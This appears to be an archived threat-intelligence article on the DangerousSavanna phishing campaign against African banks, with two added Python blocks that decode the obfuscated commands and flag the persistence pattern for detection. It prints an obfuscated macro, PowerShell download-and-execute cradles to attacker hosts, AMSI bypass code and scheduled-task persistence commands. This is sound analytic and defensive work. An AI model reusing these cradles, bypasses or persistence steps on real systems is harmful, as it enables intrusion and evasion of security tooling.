{
	"id": "680e9d95-b5c9-4d5e-94a5-954be84977a7",
	"created_at": "2026-04-16T02:21:58.874603Z",
	"updated_at": "2026-04-18T02:20:57.58346Z",
	"deleted_at": null,
	"sha1_hash": "5f969656b2cf534dc73f76d861e789b18efead0e",
	"title": "DangerousSavanna: Two-year long campaign targets financial institutions in French-speaking Africa",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 145672,
	"plain_text": "DangerousSavanna: Two-year long campaign targets financial institutions in French-speaking Africa\r\nBy etal\r\nPublished: 2022-09-06 · Archived: 2026-04-16 02:07:00 UTC\r\nIntroduction\r\nRecent studies show that more than 85% of financial institutions in Central and Western Africa have repeatedly been victimized in multiple, damaging cyberattacks. In a quarter of these cases, intrusions into network systems resulted in the worst possible outcomes for the financial and banking sector: information leaks, identity theft, money transfer fraud, and bank withdrawals on false checks.\r\nIn this article, we analyze a malicious campaign called DangerousSavanna which has been targeting multiple major financial service groups in French-speaking Africa for the last two years. The threat actors behind this campaign use spear-phishing as a means of initial infection, sending emails with malicious attachments to the employees of financial institutions in at least five different French-speaking countries: Ivory Coast, Morocco, Cameroon, Senegal, and Togo. In the last few months, the campaign heavily focused on Ivory Coast. Judging by the victimology and tactics, techniques, and procedures (TTPs), we assess with medium to high confidence that the motivation behind DangerousSavanna is financial.\r\nDangerousSavanna tends to install relatively unsophisticated software tools in the infected environments. These tools are both self-written and based on open-source projects such as Metasploit, PoshC2, DWService, and AsyncRAT. The threat actors’ creativity is on display in the initial infection stage, as they persistently pursue the employees of the targeted companies, constantly changing infection chains that utilize a wide range of malicious file types, from self-written executable loaders and malicious documents, to ISO, LNK, JAR and VBE files in various combinations. 
The evolving infection chains by the threat actor reflect the changes in the threat landscape we’ve seen over the past few years as infection vectors became more sophisticated and diverse.\r\nThis publication provides an overview of the threat actors’ TTPs, the evolution of the infection chains and lures, and the infrastructure changes. We also discuss the post-infection activities conducted by the group after they gain initial access to the targets’ internal networks.\r\nhttps://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/\r\nPage 1 of 17\r\nFigure 1 – Locations of targeted financial services employees, all in French-speaking African countries.\r\nInfection Chains\r\nThe infection starts with spear-phishing emails written in French, usually sent to several employees of the targeted companies, all of which are medium to large financial groups in French-speaking Africa. In the early stages of the campaign, the phishing emails were sent using Gmail and Hotmail services. To increase their credibility, the actors began to use lookalike domains, impersonating other financial institutions in Africa such as the Tunisian Foreign Bank, Nedbank, and others. 
For the last year, the actors also used spoofed email addresses of a local insurance advisory company whose domain doesn’t have an SPF record, so receiving mail servers have no published sender policy against which to reject the forged messages.\r\nFigure 2 – An example of a phishing email in which the actors used the name of an existing employee at the impersonated company.\r\nThe type of phishing email attachments, and the subsequent infection chains, have also changed over the campaign time frame, from self-written executable loaders masquerading as PDFs in 2020 to a wide range of file types in 2022. DangerousSavanna quickly joined the trend of malicious actors shifting from “classic” macro-enabled documents to experimenting with other file types following Microsoft’s decision to block macros obtained from the internet by default.\r\nFigure 3 – Overview of the changes in the DangerousSavanna infection chains, infrastructure and payloads.\r\nMalicious Documents\r\nSince 2021, the actors have been attaching malicious documents to their phishing emails. These documents are either Word documents with macros, documents with a remote template (or, in some cases, a few layers of external templates), or PDF documents which lure the victim into downloading and then manually executing the next stage. All these documents, both MS Office and PDF, are written in French and share similar metadata such as the usernames digger, hooper davis, and HooperDEV.\r\nFigure 4 – Overview of the lure documents used in the campaign.\r\nThe basic flow utilizes Word documents with macros, which drop an LNK file in the Startup folder. 
When the LNK file is executed, it downloads PowerShell commands from the server and executes them; these perform an AMSI bypass and eventually install the PoshC2 implant.\r\nFigure 5 – Phishing document with macro – infection flow.\r\nThe macros contain a lot of unused code to complicate analysis. The code for the main functionality is trivial: it uses only reversed-string obfuscation, plus caret and quote obfuscation inside the cmd.exe arguments, to create the LNK file that retrieves the PoshC2 implant:\r\n' Helper that reverses a string; every sensitive literal in the macro is stored reversed\r\nPrivate Function guttural(ludicrous As String)\r\n    guttural = StrReverse(ludicrous)\r\nEnd Function\r\n\r\nSub automatic()\r\n    ' grandiose is not part of the excerpt; from its use below it must return the WScript.Shell object\r\n    Set tearful = grandiose(guttural(\"llehS.tpircSW\"))\r\n    Dim greasy\r\n    ' Shortcut path: <Startup folder>/logo.lnk, so it runs at the next logon\r\n    cowardly = tearful.SpecialFolders(guttural(\"putratS\")) \u0026 guttural(\"knl.ogol/\")\r\n    Set great = tearful.CreateShortcut(cowardly)\r\n    ' Icon borrowed from a Device Stage task folder under C:\\ProgramData so the shortcut looks legitimate\r\n    great.IconLocation = guttural(\"oci.serutcip\\}9c2278fc2f8d-dda8-9bf4-e6cf-658bed70{\\ksaT\\egatS eciveD\\tfosorciM\\ataDmargorP\\:C\")\r\n    great.WindowStyle = 7\r\n    ' Target is cmd.exe (the literal is split with \u0026 as well as reversed); the arguments are a reversed, caret- and quote-obfuscated PowerShell download cradle\r\n    great.TargetPath = guttural(\"ex\" \u0026 \"e.dmc\")\r\n    great.Arguments = guttural(\")^)'\"\"d\"\"d/t^t/m\"\"o\"\"c.ez\"\"i\"\"ig.s\"\"s\"\"erp//:p\"\"t\"\"th'(gn\"\"i\"\"rtSdao^lnw\"\"o\"\"d.)tnei^lcb\"\"e\"\"w.t^en tcej^bo-\"\"w\"\"en((x\"\"e\"\"i c^- i^n^on- ss^a^py^B c^e^xE- ne^ddi^h dn^i^w- po^n- e^xe.l^lehs^re^w^op c/, ex^e.d^mc\")\r\n    great.WorkingDirectory = \"C:\"\r\n    great.HotKey = Chr(69 - 4)\r\n    great.Description = \"OpenDrive\"\r\n    great.Save\r\nEnd Sub\r\nOnce the reversals are undone, the carets (which cmd.exe discards) and the quote characters (which PowerShell’s argument parser drops) removed, the shortcut runs cmd.exe ,/c powershell.exe -nop -wind hidden -Exec Bypass -noni -c iex((new-object net.webclient).downloadString('http://press.giize[.]com/tt/dd')), i.e. a cradle that fetches the next stage from press.giize[.]com (listed in the IOCs) and passes it straight to Invoke-Expression.\r\nDuring this campaign, we observed multiple variations of this flow:\r\nIn some cases, a similar macro drops the LNK file to the Desktop instead of the Startup folder; the LNK file is usually called IMPORTANT_2022.lnk and needs an action by the user to run. 
Both the Desktop and Startup LNK methods rely on additional actions on the infected machine (a user double-click or a logon) and therefore avoid the automatic execution of suspicious PowerShell in a sandbox environment.\r\nThe initial attachment might be a DOCX document that downloads an external template executing a similar macro. In some cases, we’ve seen a chain of remote templates being retrieved before the final document with the actual macro is delivered.\r\nSome early versions of the macro directly run the PoshC2 PowerShell dropper and skip the LNK step.\r\nThe documents containing macros are often delivered in container files, such as ZIP and ISO files.\r\nIn addition, the actors actively use PDF files to lure the user into downloading and manually executing the next stage. These are VBE or JAR files that perform very similar actions, directly loading the PoshC2 implant or dropping an LNK file to load PoshC2.\r\nPoshC2\r\nRecently, the actors have relied mostly on PoshC2 implants to control the infected machines. Typically, the initial infection launches PowerShell to download code from a Pastebin-like service called paste.c-net.org or from a dedicated C\u0026C server, which replies with a PowerShell PoshC2 implant, usually consisting of three byte-encoded blocks (all standard modules from PoshC2). 
The first two PowerShell code blocks that are executed contain two very similar AMSI bypass techniques:\r\n# Bypass 1: locate the AmsiUtils type and its amsiInitFailed field by wildcard, then set the field to $true\r\n$a = [Ref].Assembly.GetTypes();\r\nForEach($b in $a) {\r\n    if ($b.Name -like \"*iutils\") { $c = $b }\r\n};\r\n$d = $c.GetFields('NonPublic,Static');\r\nForEach($e in $d) {\r\n    if ($e.Name -like \"*itFailed\") { $f = $e }\r\n};\r\n$f.SetValue($null,$true)\r\n# Bypass 2: the same field addressed directly by name\r\n[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\r\nBoth variants flip the private static amsiInitFailed flag inside System.Management.Automation.AmsiUtils, so every later scan request from that PowerShell process behaves as if AMSI initialization had failed; the first variant merely avoids spelling out the type and field names, which defeats naive string signatures on the second.\r\nThe third block contains a backdoor which is responsible for communication with the C\u0026C server. 
It sends requests to the server in a loop with a cookie called SessionID, whose value is a base64-encoded, AES-encrypted string that contains information about the victim:\r\n\"$env:userdomain;$u;$env:computername;$env:PROCESSOR_ARCHITECTURE;$pid;$procname;1\"\r\nThe script expects the response from the C\u0026C to be a PowerShell script as well, since it passes the result to the Invoke-Expression cmdlet.\r\nAsyncRAT\r\nBack in October 2021, we observed a case where a malicious document from the campaign reached out to paste.c-net.org but instead retrieved a PowerShell script that loads an AsyncRAT assembly in memory. However, this AsyncRAT build is completely unobfuscated and in fact contains a server certificate with the CN “AsyncRAT Server”, showing the attackers gave little thought to making any changes to the open-source tool.\r\nFigure 6 – AsyncRAT source code on GitHub vs decompiled AsyncRAT (on the right)\r\nOlder document versions\r\nThe earliest versions of the documents, dated in the first half of 2021, have different macros which are significantly more obfuscated and contain more than 1MB of junk code.\r\nFigure 7 – A part of the Vba2graph visualization of the 1.7MB macros for the May 2021 document (md5:a09b19b6975e090fb4eda6ced1847b1), with the only functional flow starting from Document_Open.\r\nOne of these documents, called Nouvelles_Dispositions_Sanitaires.doc (New Sanitary Provisions.doc), uses a macro to download a PowerShell script from 4sync.com, a cloud storage service for syncing files between devices, and then loads and executes in memory an assembly from http://3.8.126[.]182/minom.txt. A very similar document, thoroughly detailed back in May 2021 in a blog post by InQuest, also used 4sync to install what seemed to be a custom backdoor named Billang. 
It’s a .NET executable with this PDB path: C:\\Users\\wallstreet\\source\\repos\\Billang\\Billang\\obj\\Release\\Billang.pdb. It collects some information about the machine it’s running on, sends it to the remote server, and retrieves another .NET executable called liko (or, based on the PDB path, WindowsFormsApp3). Among other features, this program injects byte-reversed Meterpreter HTTPS shellcode into the mspaint.exe process. Another interesting feature of this binary is that the shellcode only launches after detecting a mouse click, perhaps as an anti-sandbox feature.\r\nFigure 8 – Shellcode injection from WindowsFormsApp3.exe (0b1d7c043be8c696d53d63fc0c834195) to mspaint.exe.\r\nSearching for more related files, we found additional executables written in C# that in a similar way launch a benign process such as notepad.exe or mspaint.exe and inject shellcode into it; the shellcode is not embedded but downloaded from a C\u0026C server. These simple injector executables vary little in their functionality. The difference between them is the obfuscation methods: some are packed with SmartAssembly, and some contain obfuscated variable names. However, all of the shellcode payloads we observed are Meterpreter shellcode, and of those executables that retain their debug information, all reference a PDB path starting with C:\\Users\\wallstreet\\.\r\nExecutable droppers\r\nIn the early days of the campaign, from the end of 2020 to the beginning of 2021, the actors relied on small self-written tools in .NET instead of documents. First-stage executable droppers attached to the phishing emails are disguised as documents and have a PDF icon and sometimes a double extension in the name (for example, Nouvelles Reformes 2021.pdf.exe, which in English is “New Reforms 2021.pdf.exe”). 
In fact, these trivial downloaders use batch scripts (or cmd commands) and PowerShell to retrieve the second-stage loaders from file-sharing platforms like 4sync.com or filesend.jp and execute them. In this specific example, the dropper creates and runs a bat file which performs an AMSI bypass via COM hijacking and then uses PowerShell to download the next-stage loader and save it on disk as WinTray.exe:\r\nFigure 9 – Simplified infection chain for “Nouvelles Reformes 2021.pdf.exe” (7b8d0b4e718bc543de4a049e23672d79)\r\nThe second-stage executables’ purpose is to inject the final payload, the Meterpreter shellcode which is usually downloaded from a hard-coded address, into different benign Windows processes. These tools are similar to those discussed by InQuest and, unless their debugging information was removed, also contain PDB paths with the unique username wallstreet.\r\nIn late 2021, some of the infection chains started using C# executables to perform even simpler actions, merely launching PowerShell to pull the next stage from a server. At the time, the campaign was already using PoshC2 implants instead of Metasploit payloads, but the tools still have PDB paths referring to wallstreet. 
(Example: C:\\Users\\wallstreet\\source\\repos\\PDF Document\\PDF Document\\obj\\Release\\PDF Document.pdb).\r\nPost-Infection Activities\r\nWhen the initial PowerShell backdoor connected to the C\u0026C, the attackers automatically sent AMSI bypass commands and a PoshC2 implant, which then retrieves a second-stage implant to add functionality to the PowerShell session. Next, the actors establish persistence and perform reconnaissance, while also running some commands to try to evade detection.\r\nEvasion techniques\r\nTo evade detection, the attackers first run two additional AMSI bypass commands, even though the backdoor always starts with an AMSI bypass. They then inject shellcode into RuntimeBroker.exe and iexpress.exe, built-in Windows binaries, using the PoshC2 Inject-Shellcode module. The injected code is Sharpv4 shellcode which contains a DLL that patches AmsiScanBuffer (AMSI bypass technique) and EtwEventWrite (Event Tracing for Windows bypass technique):\r\nFigure 10 – DLL from the attacker shellcode that patches AmsiScanBuffer and EtwEventWrite.\r\nFigure 11 – Event log showing the shellcode injection into RuntimeBroker.exe.\r\nIt then loads the base64-encoded .NET executable containing a base64-encoded PoshC2 PowerShell implant. This chain of events eventually allows the actors to re-establish the backdoor in a stealthier manner, running inside a known Microsoft process.\r\nPersistence\r\nTo set up persistence, the actors drop a batch file called WinComp.bat to the disk. First, it searches for the process iexpress.exe, the one that runs the injected shellcode. If the process exists, the script terminates. 
Otherwise, it starts the PowerShell backdoor using an obfuscated command, and connects to a C2 server controlled by the attackers:\r\n@echo off\r\nSETLOCAL EnableExtensions\r\nset EXE=iexpress.exe\r\nREM Guard: if the process hosting the injected shellcode is still alive, do nothing\r\nFOR /F %%x IN ('tasklist /NH /FI \"IMAGENAME eq %EXE%\"') DO IF %%x == %EXE% goto ProcessFound\r\ngoto ProcessNotFound\r\n:ProcessFound\r\nExit\r\ngoto END\r\n:ProcessNotFound\r\nREM Caret- and quote-obfuscated download cradle: cmd strips the carets, PowerShell strips the quotes\r\ncmd cm^d.e^xe ,/c po^w^er^shel^l.ex^e -n^op -w^i^nd h^idd^en -Ex^e^c B^yp^a^ss -no^n^i -^c i\"e\"x((ne\"w\"-ob^ject ne^t.w\"e\"bcl^ient).d\"o\"wnl^oadStr\"i\"ng('ht\"\"t\"\"p://ned\"\"b\"\"ankplc.\"\"4\"\"nmn.c^om/t^t/l\"\"l\"\"')^)\r\ngoto END\r\n:END\r\nStripped of the carets and quotes, the command is powershell.exe -nop -wind hidden -Exec Bypass -noni -c iex((new-object net.webclient).downloadString('http://nedbankplc.4nmn[.]com/tt/ll')): the same download cradle as the macro’s LNK, now pointed at the lookalike Nedbank domain.\r\nAdditionally, the actors drop another script called slmgr.vbs to the disk which simply executes WinComp.bat. 
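The following Python script is an added example written for this page; it is not code from the Check Point write-up or from the actor's tooling. It undoes the layers stacked on the macro's LNK arguments above and on the WinComp.bat command line just shown: the VBA StrReverse storage (with the doubled-quote VBA literal escape), the carets that cmd.exe discards, and the quote characters that PowerShell's native argument parser drops. The sample strings are transcribed from this page with ~ standing in for the double-quote character; the URL regex and the helper names are my own.

```python
# Added example (mine, not code from the Check Point write-up or the actor's
# tooling): a normalizer for the obfuscation layers DangerousSavanna stacks
# on its cmd/PowerShell download cradles. The samples are the page's own
# macro literals and WinComp.bat command, transcribed with ~ standing in
# for the double-quote character so this file contains no literal quotes.
import re

DQ = chr(34)  # the double-quote character


def from_sample(text):
    # Restore the real quote characters in a transcribed sample.
    return text.replace('~', DQ)


def vba_literal(text):
    # A VBA string literal spells one quote character as two.
    return from_sample(text).replace(DQ + DQ, DQ)


def unreverse(text):
    # Layer 1: the macro stores every sensitive string reversed and calls
    # StrReverse (the helper named guttural on the page) at runtime.
    return text[::-1]


def strip_cmd_layers(command):
    # Layer 2: cmd.exe consumes ^ escape characters before starting the child.
    # Layer 3: PowerShell's native argv parser drops quote characters embedded
    # inside tokens, so the i~e~x spelling reaches the interpreter as iex.
    # Removing every quote is lossy for legitimately quoted arguments, which
    # is acceptable when the goal is matching and URL extraction.
    flat = command.replace('^', '').replace(DQ, '')
    return ' '.join(flat.split())


URL_RE = re.compile('https?://[A-Za-z0-9.-]+(?:/[A-Za-z0-9._/-]*)?')


def extract_urls(command):
    return URL_RE.findall(strip_cmd_layers(command))


def decode_macro_argument(vba_text):
    # Full pipeline for the LNK Arguments literal: VBA unescape, StrReverse,
    # then the cmd and PowerShell layers.
    return strip_cmd_layers(unreverse(vba_literal(vba_text)))


# --- samples transcribed from the page (~ stands for a double quote) ---
MACRO_STRINGS = {
    'object': 'llehS.tpircSW',
    'folder': 'putratS',
    'name': 'knl.ogol/',
    'target': 'ex' + 'e.dmc',   # the macro splits this literal with &
    'icon': 'oci.serutcip\\}9c2278fc2f8d-dda8-9bf4-e6cf-658bed70{\\ksaT\\egatS eciveD\\tfosorciM\\ataDmargorP\\:C',
}
MACRO_ARGUMENTS = (
    ''')^)'~~d~~d/t^t/m~~o~~c.ez~~i~~ig.s~~s~~erp//:p~~t~~th'(gn~~i~~rtSdao^lnw~~o~~d.)'''
    '''tnei^lcb~~e~~w.t^en tcej^bo-~~w~~en((x~~e~~i c^- i^n^on- ss^a^py^B c^e^xE- '''
    '''ne^ddi^h dn^i^w- po^n- e^xe.l^lehs^re^w^op c/, ex^e.d^mc'''
)
WINCOMP_LINE = from_sample(
    '''cmd cm^d.e^xe ,/c po^w^er^shel^l.ex^e -n^op -w^i^nd h^idd^en -Ex^e^c B^yp^a^ss '''
    '''-no^n^i -^c i~e~x((ne~w~-ob^ject ne^t.w~e~bcl^ient).d~o~wnl^oadStr~i~ng'''
    '''('ht~~t~~p://ned~~b~~ankplc.~~4~~nmn.c^om/t^t/l~~l~~')^)'''
)


def decoded_macro_strings():
    # The plain values behind the reversed literals used to build the LNK.
    return {key: unreverse(value) for key, value in MACRO_STRINGS.items()}


if __name__ == '__main__':
    for key, value in decoded_macro_strings().items():
        print(key, '=', value)
    print(decode_macro_argument(MACRO_ARGUMENTS))
    print(extract_urls(WINCOMP_LINE))
```

Running it prints the WScript.Shell / Startup / cmd.exe values the macro hides, the fully normalized cradle with its press.giize[.]com URL, and the nedbankplc.4nmn[.]com URL from WinComp.bat; the same strip_cmd_layers step is what a detection rule should apply to process command lines before matching on iex, downloadString or -Exec Bypass.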
To finish setting up persistence, the actors create a scheduled task to run slmgr.vbs every 5 minutes, and two different scheduled tasks to execute WinComp.bat every 6 hours. After installing the scheduled tasks, the actors add a hidden attribute to the script files to hide them from the user in the hope of avoiding detection:\r\nschtasks /create /f /sc once /st 00:00 /du 9999:59 /ri 5 /tn WinSys /tr \"C:\\Users\\Public\\slmgr.vbs\"\r\nschtasks /create /f /sc once /st 00:00 /du 9999:59 /ri 360 /tn WinSys /tr \"C:\\Users\\Public\\WinComp.bat\"\r\nschtasks /create /f /sc once /st 00:00 /du 9999:59 /ri 360 /tn WinComp /tr \"C:\\Users\\Public\\WinComp.bat\"\r\nattrib +h WinComp.bat\r\nattrib +h slmgr.vbs\r\nEach task uses a single /sc once trigger at 00:00 with a repetition interval (/ri, in minutes) and a /du of 9999:59, so it keeps repeating for roughly 416 days without needing a daily or logon trigger. Note also that the second command reuses the task name WinSys together with /f, which replaces the task created on the line before it; as listed here, only the two WinComp.bat tasks remain registered.\r\nReconnaissance\r\nOver time, multiple reconnaissance commands are sent to collect additional information about the infected computer and its network. 
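As an added example (mine, not from the write-up), the script below replays the schtasks and attrib command lines above as if they were process-creation events and applies the checks a detection engineer would want on them: a once trigger combined with /ri and a multi-year /du, an action under a user-writable directory, and a script-host extension. The event lines are constructed for the example, with ~ standing in for the double-quote character, and the VendorUpdate line is an invented benign control. Because every /create here uses /f, the replay keeps only the last definition of each task name, which is how WinSys ends up pointing at WinComp.bat rather than slmgr.vbs.

```python
# Added example (mine, not from the Check Point write-up): replay the
# schtasks.exe / attrib.exe command lines from the persistence step as
# process-creation events and flag the persistence pattern. The event lines
# are constructed for this example; ~ stands in for the double-quote
# character so the file contains no literal quotes.
import shlex

DQ = chr(34)

# Directories any user can write to; a task whose action lives here is
# suspect regardless of how legitimate the task name looks.
USER_WRITABLE = ('c:\\users\\public\\', 'c:\\programdata\\', 'c:\\windows\\temp\\', '\\appdata\\')
SCRIPT_HOST_EXT = ('.vbs', '.bat', '.cmd', '.js', '.ps1', '.hta', '.wsf')

EVENTS = [line.replace('~', DQ) for line in [
    'schtasks /create /f /sc once /st 00:00 /du 9999:59 /ri 5 /tn WinSys /tr ~C:\\Users\\Public\\slmgr.vbs~',
    'schtasks /create /f /sc once /st 00:00 /du 9999:59 /ri 360 /tn WinSys /tr ~C:\\Users\\Public\\WinComp.bat~',
    'schtasks /create /f /sc once /st 00:00 /du 9999:59 /ri 360 /tn WinComp /tr ~C:\\Users\\Public\\WinComp.bat~',
    'attrib +h WinComp.bat',
    'attrib +h slmgr.vbs',
    # invented benign control: a vendor updater on a daily schedule under Program Files
    'schtasks /create /sc daily /st 03:00 /tn VendorUpdate /tr ~C:\\Program Files\\Vendor\\update.exe~',
]]


def parse_schtasks(cmdline):
    # Return the /switch -> value mapping of a schtasks /create command line,
    # or None for anything else. posix=False keeps Windows backslashes intact
    # and leaves the surrounding quotes on the token, which are stripped here.
    tokens = shlex.split(cmdline, posix=False)
    if len(tokens) < 2 or tokens[0].lower() != 'schtasks' or tokens[1].lower() != '/create':
        return None
    opts = {}
    i = 2
    while i < len(tokens):
        switch = tokens[i].lower()
        has_value = i + 1 < len(tokens) and not tokens[i + 1].startswith('/')
        opts[switch] = tokens[i + 1].strip(DQ) if has_value else True
        i += 2 if has_value else 1
    return opts


def duration_minutes(du):
    # /du is HHHH:MM
    hours, minutes = du.split(':')
    return int(hours) * 60 + int(minutes)


def task_findings(opts):
    # Reasons a parsed /create command looks like beaconing persistence.
    reasons = []
    action = opts.get('/tr', '').lower()
    if opts.get('/sc') == 'once' and '/ri' in opts:
        du = duration_minutes(opts.get('/du', '0:0'))
        reasons.append('once-trigger repeating every %s min for %d days' % (opts['/ri'], du // 1440))
    if any(marker in action for marker in USER_WRITABLE):
        reasons.append('action in user-writable path')
    if action.endswith(SCRIPT_HOST_EXT):
        reasons.append('action is a script')
    return reasons


def replay(events):
    # Apply the commands in order: /create /f with an existing name replaces
    # that task, so the final state can hold fewer tasks than were created.
    tasks = {}
    hidden = []
    for line in events:
        opts = parse_schtasks(line)
        if opts is not None:
            tasks[opts.get('/tn')] = {'action': opts.get('/tr'), 'findings': task_findings(opts)}
        elif line.lower().startswith('attrib ') and '+h' in line.lower():
            hidden.append(line.split()[-1])
    return tasks, hidden


if __name__ == '__main__':
    final_tasks, hidden_files = replay(EVENTS)
    for name, info in final_tasks.items():
        print(name, info['action'], info['findings'])
    print('hidden after creation:', hidden_files)
```

The replay ends with three registered tasks, two of which carry all three findings, and shows the attrib +h calls landing on the very files the surviving tasks execute; the control task produces no finding.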
This includes a command from the stage 2 PoshC2 implant to grab screenshots, simply named Get-Screenshot. The attackers also send and execute a script called Get-Ipconfig (which seems to originate from Microsoft’s now-defunct TechNet Gallery, according to a comment in the script) to collect network information from the Win32_ComputerSystem WMI class. In addition, the attackers use another open-source script called Get-ComputerInfo, which differs from the built-in cmdlet of the same name found in PowerShell. This script collects data from multiple WMI classes, including information about the computer hardware and networking. Another script sent by the attackers is called Invoke-Arpscan, which uses C# to run an ARP scan over all network interfaces found on the machine.\r\nFinally, the attackers attempt to create a memory dump of the svchost.exe process, most likely to extract existing RDP credentials from it.\r\nAdditional tools\r\nAlthough the actors initially rely heavily on PoshC2 modules and extensively use its features, after some time spent on the infected machine they start downloading additional payloads. One payload is a legitimate remote access tool called DWService, which masquerades as an Intel service. The UI-based remote access tool probably gives the attackers more freedom in their hands-on-keyboard operation, with fewer chances of being caught.\r\nAnother interesting action the attackers perform on the infected machines is installing Windows Subsystem for Linux (WSL). WSL is often used by threat actors to avoid detection while running some useful tools. In our case, the attackers 
In our case, the attackers\r\nhttps://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/\r\nPage 13 of 17\n\ninstalled in WSL an open-source penetration testing tool called CrackMapExe which they use to run an SMB scan of the\r\nnetwork.\r\nAmong other tools related to this campaign, we found an executable named TITAN.exe , which is an open-source anti-EDR\r\ntool known as Backstab. This tool uses the SysInternals Process Explorer driver to kill protected anti-malware processes.\r\nThe tool was compiled from the path C:\\Users\\wallstreet\\Downloads\\Programs\\Backstab-master\\x64\\Debug\\Backstab.pdb , which tells us our wallstreet attackers probably downloaded it directly from GitHub\r\nand compiled it in Visual Studio’s default debug configuration. Together with TITAN.exe , we found an executable called\r\nPOPULAIRE.exe, internally called LoggerStamp\r\n( C:\\Users\\wallstreet\\source\\repos\\LOggerStamp\\Release\\LOggerStamp.pdb ). It’s a basic keylogger that takes advantage\r\nof the SetWindowsHookExW API to register a callback function on all keystrokes, writing them to a file bluntly named\r\nkeylogger.log in the same directory as the executable. This tool doesn’t have any C\u0026C communication mechanism and\r\nrelies on other existing backdoors to send the collected data to the attackers.\r\nVictimology\r\nDangerousSavanna targets medium or large finance-related enterprises which operate across multiple African countries. The\r\ncompanies that belong to these financial groups provide a wide range of banking products and services, and include not only\r\nbanks but also insurance companies, microfinancing companies, financial holding companies, financial management\r\ncompanies, financial advisory services, etc. Despite the relatively low complexity of their tools, we observed the signs that\r\nmight point out that the attackers managed to infect some of their targets. 
This was most likely due to the actors’ persistent attempts at infiltration. If one infection chain didn’t work out, they changed the attachment and the lure and tried targeting the same company again and again to find an entry point. With social engineering via spear-phishing, all it takes is one incautious click by an unsuspecting user.\r\nInfrastructure\r\nFigure 12 – Overview of the changes in infection chains, infrastructure and payloads.\r\nThe timeline above shows the developments in the campaign infrastructure over time. In the early stages, the actors relied on third-party file-sharing services, such as FileSend.jp or 4sync.com. In mid-2021, a large cluster of activity was tied solely to the Pastebin-like service paste.c-net.org, which was used to store all kinds of attack stages, from multiple external templates to the final PowerShell implants. In October 2021, the team behind paste.c-net.org did an impressive cleaning operation and likely began proactively monitoring potentially malicious content shared through their service. Since then, the campaign uses seemingly random servers and has tried out different kinds of intermediate servers, including bit.ly and iplogger.org redirects, lookalike domains of local financial-related institutions such as nedbank.za[.]com (masquerading as Nedbank) or paste.inexa-group[.]com (masquerading as fintech solutions provider Inexa), or simply relying on short-lived free DDNS services like Dynu.\r\nConclusion\r\nIn this article, we analyzed a malicious email campaign targeting financial institutions in West and North Africa. This campaign, which has been running for almost two years, often changes its tools and methods, demonstrating the actors’ knowledge of open-source tools and penetration testing software. 
We expect that this campaign, which shows no signs of stopping or slowing down, will continue to adjust its operations and methods with an eye to maximizing its financial gain.\r\nSpear phishing prevention is a key component of email security. Check Point Threat Emulation blocked this attack on a customer environment. In addition, complete endpoint protection is essential in preventing the most imminent threats to the endpoint, and is crucial to avoid security breaches and data compromise.\r\nIOCs\r\n020ea21556b56229bb9714e721d893df\r\n0789e52f16f5fc4ac2dbebadf53d44ec\r\n0b1d7c043be8c696d53d63fc0c834195\r\n16157cdfd7b0ea98c44df15fb2fcb417\r\n1818f84f7f51be74a408f5e193ba5908\r\n18889d70d5546b861c6fa4ec11126942\r\n192b70891de0d54af6fa46bd35a5fd87\r\n1ccd2ce1e827b598207cc65e16686b7b\r\n1eb29f64f19e07d42d9ad8f6597424b8\r\n1eed3153b1afae1676ebd0db99ac5802\r\n1f4f537e550e4299a945a97c1f8a0441\r\n28165bb98959e7e7d9be67f0d248b31d\r\n2c95e83759487d78070b56e40843c543\r\n2e7c90c45b3cd8db15cd22e0caacfd40\r\n31515f871cb12d538d53e730e5ddd406\r\n3227c8a45ce4ccf8c475a51b331720c1\r\n3c70bc09d1f8033e57323879d50ca3ce\r\n40ec0d84272f1f2394b4a3b74dafbf70\r\n46058baa3ef1bdf553d89439cacf0675\r\n46a0071b7e5ea442580a2f80d2fcef42\r\n47c68680c9a00b117764114668357e23\r\n47cf9fda04b2abef75f1eca9804aaebe\r\n496f2a2f14bda410b5f3dcff40bf56c3\r\n4f52ca22d2d28e1ecdb9fba92e4cdde3\r\n4fb7503dd8b21396bf9643e0dce70fcf\r\n4ffd8ae803d7498e2d5a7a7a3a1268f8\r\n5038e5cd4888adb3661d9958f04a1ec1\r\n505724eac0faf0eb32e4ad25ab5cddfe\r\n518a533d6ff1d86afc0f7d94c0a1be7c\r\n565a87ba8e79f5e081ea937068082afd\r\n57511cb12fb5f505b3330dfec18f3432\r\n65cbaec27b51d54dc0bceeef298719a8\r\n66ac99b3501846a6c18f2671dbf31873\r\n6702f0057c401cf390adc28d201118f8\r\n6b14a4d6212087fe8d88ad012dbc8598\r\n6b781c1082014a0177f42e918adb35de\r\n6c737910247e3122fe810df6a63581f7\r\n6c7846d955bb5f3842bb7c35fae1569a\r\n725489b29e7afbc045b2814dff5474a6\r\n72ca000f40335d771936d077d4cabefb\r\n75931e00c81274b1c279d23dfdb0bbad\r\n76a8391c77723b06587f648dcbde07e9\r\n775c0666a7a482ce664c72ed9195f120\r\n7a4927e1a2aad1bc8ccef956130df0c0\r\n7b8d0b4e718bc543de4a049e23672d79\r\n7b91f06584afdc4a2aa6edd9d04198b7\r\n853403bd5feea1ecf83e812759e1ccc7\r\n8690ccd36c9d63b63e8d0278f0449e3b\r\n886a8ded2ea2f35ee009088d2c24dd32\r\n889e8b93ec0c16ffac62ced220ed8e30\r\n8f4392f839152c9614699048ee4fea11\r\n953d5a3d8e00bbd2dba08579d95c61dc\r\n98bf46542e3e9daa280ef0b395a7dabd\r\n9a57a80692012878fcb463f41ce6dcfa\r\n9d50143836d41726b6564a524453b868\r\n9d9da1992f63776e135c1c1215ee1741\r\na027a4f65e0b0a83eccb56d9047347bd\r\na5fd946bc7e8b12cdfd207790216b4b1\r\na6d8cc18af5a983b4c1a7f4838780b01\r\naa3f386f10864f46a09610d0e03a26b5\r\naeee6b71690a1df75792fcd3d11b8ede\r\naf8de58e3538fcb40334109bcd571939\r\nb397383ba85fc726b424aac26b42f6ae\r\nb651f7dcfeb3e304f7eb636000a6b935\r\nb895d34958be7565888c15a51e0c73c7\r\nb95ba7fb130f95ccae13c54312a69d36\r\nbac7be7eebb8670ae624a0179a366148\r\nbe82532aa428dc5f30107ccfa08da8c6\r\nc43c50baa3271b375298847bf6a7fc13